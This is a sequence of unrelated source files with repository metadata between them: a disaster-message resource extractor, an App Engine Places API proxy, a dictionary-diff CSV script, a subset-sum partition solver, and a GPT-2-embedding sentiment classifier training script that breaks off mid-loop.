if get_verb_similarity_score(child.orth_,common_resource)>0.7 :
get_children(child,resource_array,modified_array)
def get_verb_similarity_score(word,given_list):
max_verb_similarity=0
if word.lower() in given_list:
max_verb_similarity=1
else:
current_verb_list=wn.synsets(word.lower())
for verb in given_list:
related_verbs=wn.synsets(verb)
for a,b in product(related_verbs,current_verb_list):
d=wn.wup_similarity(a,b)
try:
if d> max_verb_similarity:
max_verb_similarity=d
except:
continue
return max_verb_similarity
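# Illustrative note (added, not in the original file): a word that is literally in
# the list, e.g. get_verb_similarity_score('need', need_verb_list), short-circuits
# to 1; otherwise the score is the best WordNet Wu-Palmer similarity between any
# synset of the word and any synset of a list entry, so a verb that shares a
# synset with a list verb (e.g. 'necessitate' with 'need') also scores 1.0.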
def resource_in_list(resource):
related_resources=wn.synsets(resource)
max_similarity=0
chosen_word=""
if resource.lower() in common_resource:
return 1,resource
for word in common_resource:
related_words=wn.synsets(word)
#print(word,related_words)
for a,b in product(related_words,related_resources):
d=wn.wup_similarity(a,b)
try:
if d> max_similarity:
max_similarity=d
chosen_word=word
except:
continue
return max_similarity,chosen_word
def get_resource(text):
doc=nlp(text)
# try:
# [to_nltk_tree(sent.root).pretty_print() for sent in doc.sents]
# except:
# print("Exception here")
org_list=[]
prev_word=""
prev_word_type=""
for word in doc:
if word.ent_type_ in entity_type_list:
org_list.append(word.orth_+"<_>"+word.ent_type_)
else:
org_list.append("<_>")
resource_array=[]
modified_array=[]
for word in doc:
if get_verb_similarity_score(word.orth_,need_send_verb_list)>0.8 or word.dep_=='ROOT':
get_children(word,resource_array,modified_array)
if word.dep_=='cc' and word.n_lefts+word.n_rights==0:
ancestor=word.head.orth_
#print(ancestor)
if get_verb_similarity_score(ancestor,common_resource)>0.6:
get_children(word.head,resource_array,modified_array)
#print(resource_array)
#print(modified_array)
last_word=[]
# for resource in modified_array:
# print(resource)
# print(resource, resource_in_list(resource.lower()))
# for word in modified_array:
# last_word.append(word.split(' ')[-1])
final_resource={}
modified_array_2=[]
resource_array_2=[]
n_subj_list=[]
for i in modified_array:
modified_array_2.append(i[:(i.index("<_>"))])
for i in resource_array:
resource_array_2.append(i[:(i.index("<_>"))])
for resources in modified_array_2:
max_val_resource=0
val_type=""
resource_list=resources.rstrip().split(" ")
for resource in resource_list:
pres_res_val,pres_res_type=resource_in_list(resource)
if pres_res_val> max_val_resource:
val_type=pres_res_type
max_val_resource=pres_res_val
if max_val_resource > 0.6:
final_resource[resources]=val_type
for resource in resource_array_2:
#print(resource)
pres_res_val,pres_res_type=resource_in_list(resource)
if pres_res_val> 0.6:
if resource not in final_resource:
final_resource[resource]=pres_res_type
final_resource_keys=list(final_resource.keys())
prev_word_type=""
prev_word=""
org_list_2=[]
poss_places=[]
for i in org_list:
index=i.index("<_>")
if i[index+3:]=='GPE' and i[:index] in final_resource_keys:
#final_resource_keys.remove(i[:index])
poss_places.append(i[:index])
if i[index+3:]=="ORG" and prev_word_type=="ORG":
prev_word=prev_word+" "+i[:index]
elif i[index+3:]=="PERSON" and prev_word_type=="PERSON":
prev_word=prev_word+" "+i[:index]
else:
if prev_word !='':
org_list_2.append(prev_word+"<_>"+prev_word_type)
prev_word_type=i[index+3:]
prev_word=i[:index]
quantity_dict={}
for i in final_resource:
for j in re.findall(quant_no,i):
quantity_dict[i]=j
source_list=[]
org_person_list=[]
for i in org_list_2:
tag=i[i.index("<_>")+3:]
j=i[:i.index("<_>")]
if tag=="ORG" or tag=="PERSON":
if j.lower() not in nepal_stop_list:
org_person_list.append(j)
elif j.lower() not in nepal_stop_list and j not in quantity_dict.keys():
source_list.append(j)
else:
continue
for i in modified_array:
pos_res=i[:i.index("<_>")]
pos_tag=i[i.index("<_>")+3:]
if pos_tag in subj_labels:
if pos_res not in source_list and pos_res not in final_resource_keys and pos_res.lower() not in nepal_stop_list:
#print(pos_tag,pos_res)
source_list.append(pos_res)
for i in resource_array:
pos_res=i[:i.index("<_>")]
pos_tag=i[i.index("<_>")+3:]
if pos_tag in subj_labels:
if pos_res not in source_list and pos_res not in final_resource_keys and pos_res.lower() not in nepal_stop_list:
#print(pos_tag,pos_res)
source_list.append(pos_res)
return quantity_dict,final_resource_keys,source_list,poss_places,org_person_list
def get_contact(text):
numbers=re.findall(tel_no,text)
print("Contact Information")
for i in numbers:
if len(i)>=7:
print(i)
#test_file.write(str(i)+",")
#test_file.write('\nMail:')
mails= re.findall(email,text)
for i in mails:
print("Mail: "+i)
#test_file.write(str(i)+",")
|
varun-manjunath/disaster-mitigation
|
matching/common_nouns.py
|
common_nouns.py
|
py
| 7,549 |
python
|
en
|
code
| 2 |
github-code
|
6
|
24706158570
|
#!/usr/bin/python2.4
import base64
import hmac
from google.appengine.api import urlfetch
from google.appengine.ext import webapp
from google.appengine.ext.webapp.util import run_wsgi_app
import hashlib
class PlacesHandler(webapp.RequestHandler):
"""Handles requests to /places."""
def post(self):
"""Handles posts."""
self.response.headers['Content-Type'] = 'application/json'
action = self.request.get('action')
CLIENT_ID = None
PRIVATE_KEY = None
# These are required to work
if not CLIENT_ID and not PRIVATE_KEY:
self.response.out.write('{}')
return
places_url = None
if action == 'search':
location = self.request.get('location')
radius = self.request.get('radius')
url_to_sign = ('/maps/api/place/search/json?location=%s&radius=%s&client='
'%s&sensor=true') % (location, radius, CLIENT_ID)
decoded_key = base64.urlsafe_b64decode(PRIVATE_KEY)
signature = hmac.new(decoded_key, url_to_sign, hashlib.sha1)
encoded_signature = base64.urlsafe_b64encode(signature.digest())
places_url = ('http://maps.google.com/maps/api/place/search/json?'
'location=%s&radius=%s&client=%s&sensor=true&'
'signature=%s') % (location, radius, CLIENT_ID,
encoded_signature)
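# Added explanatory comment (not in the original file): this follows the classic
# Google Maps API URL-signing scheme: the path-plus-query portion of the request
# is signed with HMAC-SHA1 using the URL-safe-base64-decoded private key, and the
# URL-safe-base64-encoded digest is appended as the 'signature' query parameter.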
if places_url:
self.response.out.write(urlfetch.fetch(places_url).content)
if __name__ == '__main__':
application = webapp.WSGIApplication([('/places[/]?', PlacesHandler)],
debug=True)
run_wsgi_app(application)
|
bilal-karim/gmaps-samples-v3
|
devfest-2010/whereiscoffee/places.py
|
places.py
|
py
| 1,627 |
python
|
en
|
code
| 6 |
github-code
|
6
|
1370583347
|
"""Finds the differences between two dictionaries and writes them to a csv."""
import csv
def diff_dictionaries(DCT1, DCT2):
"""Output a dictionary of the differences between two dictionaries."""
return {player: DCT1[player] for player in set(DCT1) - set(DCT2)}
def write_to_csv(dct):
"""Write dictionary to csv."""
with open("diffs.csv", "w") as out_file:
out_csv = csv.writer(out_file)
out_csv.writerow(["player", "number"])
for player, jersey_number in dct.items():
keys_values = (player, jersey_number)
out_csv.writerow(keys_values)
print('\n"diffs.csv" exported successfully\n')
DCT1 = {
"boomer": "7",
"muñoz": "78",
}
DCT2 = {
"montana": "16",
"boomer": "7",
}
DIFF1 = diff_dictionaries(DCT1, DCT2)
DIFF2 = diff_dictionaries(DCT2, DCT1)
MERGED_DIFFS = {**DIFF1, **DIFF2}
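# Worked example (added comment): with the sample data above, DIFF1 is
# {"muñoz": "78"} (keys present in DCT1 but not DCT2) and DIFF2 is
# {"montana": "16"}, so MERGED_DIFFS holds both rows that end up in diffs.csv.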
write_to_csv(MERGED_DIFFS)
|
craighillelson/diff_dicts
|
diff_dicts.py
|
diff_dicts.py
|
py
| 910 |
python
|
en
|
code
| 0 |
github-code
|
6
|
4769812727
|
'''Partition a set into two subsets such that the difference of subset sums is minimum.
Given a set of integers, the task is to divide it into two sets S1 and S2 such that the absolute difference between their sums is minimum.'''
#This function returns the list of all subset sums that are achievable
def subsetSum(arr):
totalSum = sum(arr)
t = [[None for _ in range(totalSum + 1)] for _ in range(len(arr) + 1)]
for i in range(len(arr) + 1):
for j in range(totalSum + 1):
if j == 0:
t[i][j] = True
elif i == 0:
t[i][j] = False
elif arr[i - 1] <= j:
t[i][j] = t[i - 1][j - arr[i - 1]] or t[i - 1][j]
else:
t[i][j] = t[i - 1][j]
subsetSums = []
for j in range(totalSum + 1):
if t[len(arr)][j]:
subsetSums.append(j)
return subsetSums
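# Added note: t[i][j] is True when some subset of the first i elements sums to j,
# so the final row of the table marks every achievable subset sum of the array.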
def minSubsetSumDifference(arr):
#Find all the sum of subsets possible
subsetSums = subsetSum(arr)
#Find upper bound of sum of subsets
totalSum = sum(arr)
#Initialize min difference at the upper bound
minDiff = totalSum
#If one subset sums to s1, the other sums to (totalSum - s1), so their difference is (totalSum - 2*s1)
#Try to minimize (totalSum - 2*s1) using the lower half of all subset sums
for s1 in subsetSums[0:len(subsetSums)//2 + 1]:
    minDiff = min(minDiff, abs(totalSum - 2 * s1))
#Return the value of min difference possible
return minDiff
if __name__ == "__main__" :
array = list(map(int, input('Enter the numbers seperated by spaces:').split(' ')))
print(minSubsetSumDifference(array))
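# Worked example (added comment, not part of the original script): for
# arr = [1, 6, 11, 5] the total is 23 and the best split is {1, 5, 6} vs {11}
# (sums 12 and 11), so minSubsetSumDifference([1, 6, 11, 5]) returns 1.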
|
subhajitsinha1998/DynamicPrograming
|
minSubsetSumDifference.py
|
minSubsetSumDifference.py
|
py
| 1,707 |
python
|
en
|
code
| 0 |
github-code
|
6
|
13902158282
|
mA = [[ 1, 2, 3],[ 4, 5, 6]]
t = [[ 1, 4],
[ 2, 5],
[ 3, 6]]
matriz = [[1,2,3],[4,5,6]]
def transpuesta(mA):
t = []
for i in range(len(mA[0])):
t.append([])
for j in range(len(mA)):
t[i].append(mA[j][i])
return t
matrizTranspuesta = transpuesta(matriz)
for linea in matriz:
for elemento in linea:
print(elemento, end=" ")
print()
print("""""")
for linea in matrizTranspuesta:
for elemento in linea:
print(elemento, end=" ")
print()
|
Nayherly/INFORME02
|
Matrices/4.Transpuesta.py
|
4.Transpuesta.py
|
py
| 514 |
python
|
en
|
code
| 0 |
github-code
|
6
|
4328206070
|
"""
The game is played on a square board divided into 20 rows and 20 columns, for
a total of 400 squares. There are a total of 84 game tiles, organized into 21
shapes in each of four colors: blue, yellow, red and green. The 21 shapes are
based on free polyominoes of from one to five squares (one monomino, one
domino, two trominoes/triominoes, five tetrominoes, and 12 pentominoes).
The standard rules of play for all variations of the game are as follows:
Order of play is based on the color of pieces: blue, yellow, red, green.
The first piece played of each color is placed in one of the board's four
corners. Each new piece played must be placed so that it touches at least
one piece of the same color, with only corner-to-corner contact allowed-edges
cannot touch. However, edge-to-edge contact is allowed when two pieces of
different color are involved.
When a player cannot place a piece, he or she passes, and play continues as
normal. The game ends when no one can place a piece.
When a game ends, the score is based on the number of squares in each
player's pieces on the board (e.g. a tetromino is worth 4 points). A player
who played all of his or her pieces is awarded a +20 point bonus if the last
piece played was a monomino, or a +15 point bonus for any other piece.
"""
BOARD_SIZE = 20
EMPTY_SQUARE = ' '
BLUE = 'blue'
YELLOW = 'yellow'
RED = 'red'
GREEN = 'green'
COLORS = [BLUE, YELLOW, RED, GREEN]
MONOMINO = [[1]]
DOMINO = [[1, 1]]
TRIOMINOE_L = [[1, 1], [0, 1]]
TRIOMINOE_LINE = [[1, 1, 1]]
TETROMINO_SQUARE = [[1, 1], [1, 1]]
TETROMINO_T = [[0,1,0], [1,1,1]]
TETROMINO_LINE = [[1,1,1,1]]
TETROMINO_L = [[0,0,1],[1,1,1]]
TETROMINO_Z = [[0,1,1],[1,1,0]]
PENTOMINO_LONG_L = [[1,0,0,0],[1,1,1,1]]
PENTOMINO_T = [[0,1,0],[0,1,0],[1,1,1]]
PENTOMINO_L = [[1,0,0],[1,0,0],[1,1,1]]
PENTOMINO_LONG_Z = [[0,1,1,1],[1,1,0,0]]
PENTOMINO_Z = [[0,0,1],[1,1,1],[1,0,0]]
PENTOMINO_LINE = [[1,1,1,1,1]]
PENTOMINO_UTAH = [[1,0],[1,1],[1,1]]
PENTOMINO_W = [[0,1,1],[1,1,0],[1,0,0]]
PENTOMINO_GATE = [[1,1],[1,0],[1,1]]
PENTOMINO_WRENCH = [[0,1,1],[1,1,0],[0,1,0]]
PENTOMINO_CROSS = [[0,1,0], [1,1,1],[0,1,0]]
PENTOMINO_BATON = [[0,1,0,0],[1,1,1,1]]
PIECES = [
MONOMINO,
DOMINO,
TRIOMINOE_LINE, TRIOMINOE_L,
TETROMINO_Z, TETROMINO_L, TETROMINO_LINE, TETROMINO_T, TETROMINO_SQUARE,
PENTOMINO_T, PENTOMINO_L, PENTOMINO_LONG_Z, PENTOMINO_Z, PENTOMINO_LINE,
PENTOMINO_UTAH, PENTOMINO_W, PENTOMINO_GATE, PENTOMINO_WRENCH,
PENTOMINO_CROSS, PENTOMINO_BATON
]
class Piece(object):
# A piece is represented by a NxM grid. Each square in the grid is filled or
# empty (1 or 0)
def __init__(self, color, grid):
self.color = color
self.grid = grid
def get_color(self):
colors_to_letter = {
BLUE: 'B',
YELLOW: 'Y',
RED: 'R',
GREEN: 'G',
}
return colors_to_letter[self.color]
def __str__(self):
ret = ''
for row in self.grid:
c_row = ''
for c in row:
if c:
c_row += self.get_color()
else:
c_row += ' '
ret += c_row + '\n'
return ret
def rotate(self):
# 90 degree clockwise
rotated = zip(*self.grid[::-1])
self.grid = [list(t) for t in rotated]
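# Added comment: reversing the rows and zipping the columns is the standard
# 90-degree clockwise rotation trick, e.g. [[1, 1], [0, 1]] becomes
# [[0, 1], [1, 1]].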
def flip(self):
# About the y-axis
self.grid = [row[::-1] for row in self.grid]
class Board(object):
def __init__(self, board_size):
self.board_size = board_size
self.board = [[EMPTY_SQUARE for i in range(board_size)] for j in range(board_size)]
def __repr__(self):
ret = ''
for row in self.board:
ret += str(row) + '\n'
return ret
def __str__(self):
ret = ''
for row in self.board:
ret += str(row) + '\n'
return ret
def place(self, piece, x, y):
# Place piece at position x, y
# idea: x and y represent the top left position of the piece they want to add
j = y
for row in piece.grid:
i = x
for blip in row:
self.board[i][j] = piece.get_color() if blip else EMPTY_SQUARE
i += 1
j += 1
board = Board(BOARD_SIZE)
print(board)
for p in PIECES:
piece = Piece(GREEN, p)
for i in range(2):
print(piece)
piece.flip()
for p in PIECES:
piece = Piece(GREEN, p)
for i in range(4):
print(piece)
piece.rotate()
z_piece = Piece(GREEN, TETROMINO_Z)
z_piece.rotate()
board.place(z_piece, 0, 0)
z_piece.rotate()
board.place(z_piece, 3, 1)
z_piece.flip()
board.place(z_piece, 7, 1)
print(board)
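# A minimal end-of-game scoring sketch (added; not part of the original file),
# following the rules quoted in the module docstring. The function and its
# arguments (pieces_played, played_all, last_was_monomino) are hypothetical:
# the Board/Piece classes above do not track them.
def score_player(pieces_played, played_all=False, last_was_monomino=False):
    """Return one point per placed square, plus the end-of-game bonus."""
    squares = sum(sum(row) for piece in pieces_played for row in piece.grid)
    if played_all:
        squares += 20 if last_was_monomino else 15
    return squares
# Example: score_player([Piece(GREEN, MONOMINO), Piece(GREEN, TETROMINO_T)]) == 5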
|
wnojopra/obstructus
|
game.py
|
game.py
|
py
| 4,419 |
python
|
en
|
code
| 0 |
github-code
|
6
|
31958051556
|
import sys
import csv
def main():
# get command line arguments
inputdatabase = sys.argv[1]
inputsequence = sys.argv[2]
# open database file
csvfile = open(inputdatabase, newline='')
databaseobj = csv.reader(csvfile)
# load database into array
database = []
for row in databaseobj:
database.append(row)
# open sequence file
txtfile = open(inputsequence)
sequence = txtfile.read()
# initialise array to store max counts of each STR in the sequence
STRset = [0] * (len(database[0]) - 1)
# for each STR in the csv header row
for i in range(1, len(database[0])):
# get number of consecutive STRs for the sequence
STRset[i - 1] = count(database[0][i], sequence)
# for each name row in the database
for i in range(1, len(database)):
# default match is true
match = True
# iterate through each STR count
for j in range(1, len(database[i])):
# check against STRset
if int(database[i][j]) != STRset[j - 1]:
# set match to false if not equal
match = False
# if all counts match the set, print the name in database and stop program
if match == True:
print(database[i][0])
return 0
# if no matches, print No Match
print("No match")
# function to calculate the highest number of consecutive repeats of a given STR for a given string (sequence)
def count(STR, sequence):
# create array to store number of repeats for each position in the sequence
repeats = [None] * len(sequence)
# iterate through each character in the sequence
for i in range(len(sequence)):
# calculate how many repeats of the STR appear consecutively from this point and update repeats array
repeats[i] = STRcheck(i, sequence, STR)
# get highest number of repeats anywhere in the sequence
return (max(repeats))
# function to calculate how many consecutive repeats of an STR there are at a given position in a sequence
def STRcheck(position, sequence, STR):
# initialise counter
count = 0
# check if the next len(STR) characters match the STR
if sequence[position:position + len(STR)] == STR:
# update counter
count += 1
# recall STRcheck from this position
count += STRcheck(position + len(STR), sequence, STR)
return count
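# Worked example (added comment): with STR = "AGAT" and
# sequence = "AGATAGATAGATTTT", STRcheck finds three consecutive copies starting
# at position 0 and fewer at every later position, so count returns 3.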
main()
|
Verano-20/CS50-PSET6-DNA
|
dna.py
|
dna.py
|
py
| 2,420 |
python
|
en
|
code
| 1 |
github-code
|
6
|
29832128346
|
import cv2
#Reading Image
img = cv2.imread('img46_gray_noise.png')
#Aplying filter
median = cv2.medianBlur(img,3)
#Showing image
cv2.imshow("Noised Image", img)
cv2.imshow("median", median)
cv2.waitKey()
cv2.destroyAllWindows()
#Save result
cv2.imwrite("denoised_image.png", median)
|
Digu62/computer_vision_challenges
|
Questao1/main.py
|
main.py
|
py
| 286 |
python
|
en
|
code
| 0 |
github-code
|
6
|
75118275066
|
import sqlite3
with open("C:\\Users\Asmaa Samir\Desktop\Project\data.txt", "w") as myFile:
my_tuple1 = ('google.com ', '198.188.3.2 ', '255.255.255.0', '11:01 ')
my_tuple2 = ('youtube.com', '199.588.35.22', '255.255.255.0', '1:01')
my_tuple3 = ('google.com', '198.155.66.1', '255.255.255.0', '7:55')
myFile.writelines(my_tuple1)
myFile.writelines(my_tuple2)
myFile.writelines(my_tuple3)
db = sqlite3.connect("data.db") # create database and connect
cr = db.cursor()  # activate the cursor
# noinspection SqlNoDataSourceInspection
cr.execute("CREATE TABLE Analysis (User Name text, IP , MAC ,URLs being visited ,TIME) ")
cr.execute("insert into Analysis values(?, ?, ?, ?, ?)", my_tuple1) # insert data
cr.execute("insert into skills values(?, ?, ?, ?, ?)", my_tuple2)
cr.execute("insert into skills values(?, ?, ?, ? , ?)", my_tuple3)
db.commit() # save
db.close() # close
|
AsmaaGHSamir/GProject
|
DB.py
|
DB.py
|
py
| 926 |
python
|
en
|
code
| 1 |
github-code
|
6
|
27645529568
|
''' COMPSCI 235 (2021) - University of Auckland
ASSIGNMENT PHASE TWO
Simon Shan 441147157
Flask app entry point
'''
from library import create_app
app = create_app()
if __name__ == '__main__':
app.run(
host='localhost',
port=5000,
threaded=False,
)
|
mightbesimon/library-flask-website
|
wsgi.py
|
wsgi.py
|
py
| 299 |
python
|
en
|
code
| 1 |
github-code
|
6
|
25755936450
|
import unittest
from constants import (
LAST_NAME_1,
LAST_NAME_2,
LAST_NAME_3,
LAST_NAME_4,
LAST_NAME_UPDATED,
LAST_NAME_TEST,
FIRST_NAME_1,
FIRST_NAME_2,
FIRST_NAME_3,
FIRST_NAME_4,
FIRST_NAME_JOHN,
FIRST_NAME_UPDATED,
MIDDLE_NAME_1,
MIDDLE_NAME_2,
MIDDLE_NAME_3,
MIDDLE_NAME_4,
MIDDLE_NAME_DOE,
MIDDLE_NAME_UPDATED,
POSITION_1,
POSITION_2,
POSITION_3,
POSITION_4,
POSITION_ENGINEER,
POSITION_UPDATED
)
from main import app, bd
from models.employee_model import Employee
from repository.employee_repository import EmployeeRepository
from service.employee_service import get_all_employees, create_employee, update_employee, delete_employee
class EmployeeServiceTestCase(unittest.TestCase):
def setUp(self):
app.testing = True
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///test.db'
self.app_context = app.app_context()
self.app_context.push()
bd.create_all()
self.client = app.test_client()
self.repository = EmployeeRepository()
def tearDown(self):
bd.session.remove()
bd.drop_all()
def test_get_all_employees(self):
employee1 = Employee(last_name=LAST_NAME_1, first_name=FIRST_NAME_1, middle_name=MIDDLE_NAME_1,
position=POSITION_1)
employee2 = Employee(last_name=LAST_NAME_2, first_name=FIRST_NAME_2, middle_name=MIDDLE_NAME_2,
position=POSITION_2)
employee3 = Employee(last_name=LAST_NAME_3, first_name=FIRST_NAME_3, middle_name=MIDDLE_NAME_3,
position=POSITION_3)
employee4 = Employee(last_name=LAST_NAME_4, first_name=FIRST_NAME_4, middle_name=MIDDLE_NAME_4,
position=POSITION_4)
self.repository.create(employee1)
self.repository.create(employee2)
self.repository.create(employee3)
self.repository.create(employee4)
employees = get_all_employees()
self.assertEqual(len(employees), 4)
self.assertEqual(employees[0]['last_name'], LAST_NAME_1)
self.assertEqual(employees[0]['first_name'], FIRST_NAME_1)
self.assertEqual(employees[0]['middle_name'], MIDDLE_NAME_1)
self.assertEqual(employees[0]['position'], POSITION_1)
self.assertEqual(employees[1]['last_name'], LAST_NAME_2)
self.assertEqual(employees[1]['first_name'], FIRST_NAME_2)
self.assertEqual(employees[1]['middle_name'], MIDDLE_NAME_2)
self.assertEqual(employees[1]['position'], POSITION_2)
self.assertEqual(employees[2]['last_name'], LAST_NAME_3)
self.assertEqual(employees[2]['first_name'], FIRST_NAME_3)
self.assertEqual(employees[2]['middle_name'], MIDDLE_NAME_3)
self.assertEqual(employees[2]['position'], POSITION_3)
self.assertEqual(employees[3]['last_name'], LAST_NAME_4)
self.assertEqual(employees[3]['first_name'], FIRST_NAME_4)
self.assertEqual(employees[3]['middle_name'], MIDDLE_NAME_4)
self.assertEqual(employees[3]['position'], POSITION_4)
def test_create_employee(self):
employee_data = {
'last_name': LAST_NAME_TEST,
'first_name': FIRST_NAME_JOHN,
'middle_name': MIDDLE_NAME_DOE,
'position': POSITION_ENGINEER
}
create_employee(employee_data)
employees = self.repository.get_all()
self.assertIsNotNone(employees)
self.assertEqual(len(employees), 1)
self.assertEqual(employees[0].last_name, LAST_NAME_TEST)
self.assertEqual(employees[0].first_name, FIRST_NAME_JOHN)
self.assertEqual(employees[0].middle_name, MIDDLE_NAME_DOE)
self.assertEqual(employees[0].position, POSITION_ENGINEER)
def test_update_employee(self):
employee = Employee(last_name=LAST_NAME_1, first_name=FIRST_NAME_1, middle_name=MIDDLE_NAME_1,
position=POSITION_1)
self.repository.create(employee)
data = {
'last_name': LAST_NAME_UPDATED,
'first_name': FIRST_NAME_UPDATED,
'middle_name': MIDDLE_NAME_UPDATED,
'position': POSITION_UPDATED
}
updated_employee = update_employee(employee.id, data)
self.assertEqual(updated_employee.last_name, LAST_NAME_UPDATED)
self.assertEqual(updated_employee.first_name, FIRST_NAME_UPDATED)
self.assertEqual(updated_employee.middle_name, MIDDLE_NAME_UPDATED)
self.assertEqual(updated_employee.position, POSITION_UPDATED)
def test_delete_employee(self):
employee_data = {
'last_name': LAST_NAME_TEST,
'first_name': FIRST_NAME_JOHN,
'middle_name': MIDDLE_NAME_DOE,
'position': POSITION_ENGINEER
}
employee = create_employee(employee_data)
employee_id = employee.id
result = delete_employee(employee_id)
self.assertTrue(result)
deleted_employee = self.repository.get_by_id(employee_id)
self.assertIsNone(deleted_employee)
if __name__ == '__main__':
unittest.main()
|
dan9Protasenia/task-management
|
tests/test_employee_service.py
|
test_employee_service.py
|
py
| 5,175 |
python
|
en
|
code
| 0 |
github-code
|
6
|
6729300182
|
#!/usr/bin/env python
#-*- coding: utf-8 -*-
"""
@file: oracle_cls.py
@author: ImKe at 2022/2/23
@email: [email protected]
@feature: #Enter features here
"""
import torch.nn as nn
import torch
import datetime, os, copy, math, time, collections, argparse, nltk, json, sys
sys.path.append('../')
import numpy as np
from tqdm import tqdm
from torch.utils.data import Dataset, DataLoader
from tensorboardX import SummaryWriter
from src.logger import Logger
from src.data import ConditionalGenerationDataset
from transformers import GPT2Tokenizer, GPT2LMHeadModel, GPT2Config, AdamW, get_linear_schedule_with_warmup
parser = argparse.ArgumentParser()
# Default parameters are set based on single GPU training
parser.add_argument('--lr', type=float, default=5e-5)
parser.add_argument("--seed", type=int, default=42)
parser.add_argument('--class_num', type=int, default=2)
parser.add_argument('--batch_size', type=int, default=200)
parser.add_argument('--max_length', type=int, default=30)
parser.add_argument('--iterations', type=int, default=15000 * 3)
parser.add_argument('--dataset', type=str, default='yelp_polarity', choices=['yelp_polarity', 'imdb_polarity'],
help="Dataset to use for training")
parser.add_argument('--out_dir', type=str, default='cls_train_out')
parser.add_argument('--gpu', default=0, type=int)
parser.add_argument('--no_gpu', action="store_true")
parser.add_argument('--workers', default=2, type=int, metavar='N',
help='number of data loading workers')
def tokenize(texts, tokenizer, device, args):
# tokenizer.pad_token = tokenizer.eos_token
x_tokenized = tokenizer(texts, padding=True,
truncation=True,
return_tensors='pt', max_length=args.max_length)
input_ids = x_tokenized['input_ids'][:, :-1].to(device)
attention_mask = x_tokenized['attention_mask'][:, 1:].to(device)
x_ids = x_tokenized['input_ids'][:, 1:].contiguous().to(device)
## target, input tokens, mask
return x_ids, input_ids, attention_mask
class Oracle_Classifier(nn.Module):
def __init__(self, config, class_num, wte):
super(Oracle_Classifier, self).__init__()
self.class_num = class_num
self.gpt_embeddings = nn.Embedding(config.vocab_size, config.n_embd)
self.gpt_embeddings.weight.data = wte.weight.data
self.conv1 = nn.Conv1d(config.hidden_size, config.hidden_size, 3)
self.classifier = nn.Linear(config.hidden_size, 1 if self.class_num <= 2 else self.class_num)
self.BCEWithLogitsLoss = nn.BCEWithLogitsLoss()
def step(self, optimizer, loss):
optimizer.zero_grad()
loss.backward()
optimizer.step()
return loss.item()
def forward(self, sentences, cond_labels):
ft = self.gpt_embeddings(sentences)
ft = self.conv1(ft.transpose(1, 2))
ft = torch.mean(ft, dim=-1)
ft = self.classifier(ft)
prob_cls = ft.squeeze(1)
loss_cls = self.BCEWithLogitsLoss(prob_cls, cond_labels.float())
pred_cls = (prob_cls >= 0).to(dtype=torch.long)
acc_cls = (pred_cls == cond_labels).float()
return loss_cls, acc_cls
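# Added note (not in the original file): forward() embeds the token ids with
# GPT-2-initialised word embeddings, runs a 1-D convolution over the sequence,
# mean-pools across positions, and applies a linear head; in the binary case the
# single logit is compared against 0 to get pred_cls, and BCEWithLogitsLoss is
# used as the classification loss.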
def train(args):
# GPU
if not torch.cuda.is_available(): args.no_gpu = True
gpu = not args.no_gpu
if gpu:
print("There are ", torch.cuda.device_count(), " available GPUs!")
# print('Setting GPUs {}'.format(args.device))
# print('Using GPU devices {}'.format(devices))
torch.cuda.set_device(args.gpu)
print('Current single GPU: {}'.format(torch.cuda.current_device()))
device = torch.device(args.gpu if gpu else "cpu")
# randomness
np.random.seed(args.seed)
prng = np.random.RandomState()
torch.random.manual_seed(args.seed)
if gpu: torch.cuda.manual_seed(args.seed); torch.cuda.manual_seed_all(args.seed)
save_folder = os.path.join(args.out_dir, "oracle_cls")
os.makedirs(save_folder, exist_ok=True)
t_writer = SummaryWriter(os.path.join(save_folder, 'train'), flush_secs=5)
v_writer = SummaryWriter(os.path.join(save_folder, 'val'), flush_secs=5)
logging_file = "oracle_cls.log"
logging = Logger(os.path.join(args.out_dir, logging_file))
# t_writer = SummaryWriter(os.path.join(save_folder, 'train'), flush_secs=5)
logging.info('\n*******************************************************************************\n')
logging.info("the configuration:")
logging.info(str(args).replace(',', '\n'))
logging.info('Loading models...')
config = GPT2Config()
gpt2_model = GPT2LMHeadModel.from_pretrained('gpt2', cache_dir='/home/tuhq/.cache/torch/transformers')
tokenizer = GPT2Tokenizer.from_pretrained('gpt2', cache_dir='/home/tuhq/.cache/torch/transformers')
tokenizer.pad_token = tokenizer.eos_token
model = Oracle_Classifier(config, args.class_num, wte=gpt2_model.transformer.wte)
optimizer = AdamW(model.parameters(), lr=args.lr, correct_bias=True)
model = model.to(device)
model.train()
logging.info('Setup data...')
train_loader = DataLoader(
ConditionalGenerationDataset.from_file(f"../data/{args.dataset}/train.txt"),
batch_size=args.batch_size,
pin_memory=True,
drop_last=False,
shuffle=True,
num_workers=args.workers)
test_loader = DataLoader(
ConditionalGenerationDataset.from_file(f"../data/{args.dataset}/test.txt"),
batch_size=args.batch_size,
pin_memory=True,
drop_last=False,
shuffle=True,
num_workers=args.workers)
val_loader = DataLoader(
ConditionalGenerationDataset.from_file(f"../data/{args.dataset}/valid.txt"),
batch_size=args.batch_size,
pin_memory=True,
drop_last=False,
shuffle=True,
num_workers=args.workers)
logging.info('Done.')
def val_step(val_loader):
model.eval()
val_loss_list, val_acc_list = [], []
with tqdm(total=min(len(val_loader), max_val_batches), desc="Evaluating Model") as pbar:
            for i, val_data_dict in enumerate(val_loader):
                if i >= max_val_batches:
                    break  # cap validation at max_val_batches batches (matches the tqdm total)
                with torch.no_grad():
                    val_x_ids, val_input_ids, val_attention_mask = tokenize(val_data_dict['x'], tokenizer, device, args)
                    val_labels = torch.tensor(val_data_dict['y']).to(device)
                    val_loss_cls, val_acc_cls = model(val_input_ids, val_labels)
                    val_loss_list.append(val_loss_cls.item())
                    val_acc_list.append(val_acc_cls.mean().item())
                pbar.update(1)
val_loss = np.mean(val_loss_list)
val_acc = np.mean(val_acc_list)
val_loss_std = np.std(val_loss_list)
val_acc_std = np.std(val_acc_list)
logging.info("val loss: %.4f + %.4f" % (val_loss, val_loss_std))
logging.info("val acc : %.4f + %.4f" % (val_acc, val_acc_std))
model.train()
return val_acc
best_acc = 0.0
logging.info("Begin training iterations")
max_val_batches = 200 # max num. of val batches
logging.info("Total iteration: %d" % args.iterations)
e = 0 # number of epoch
num_iters = 0
et = 0
while num_iters < args.iterations:
# Run epoch
# Training
print('Training loop. Batches:', len(train_loader))
logging.info('\n----------------------------------------------------------------------')
logging.info("Training loop. Batches: %d" % len(train_loader))
with tqdm(total=len(train_loader)) as pbar:
for i, data_dict in enumerate(train_loader):
x_ids, input_ids, attention_mask = tokenize(data_dict['x'], tokenizer, device, args)
cond_labels = torch.tensor(data_dict['y']).to(device)
loss_cls, acc_cls = model(input_ids, cond_labels)
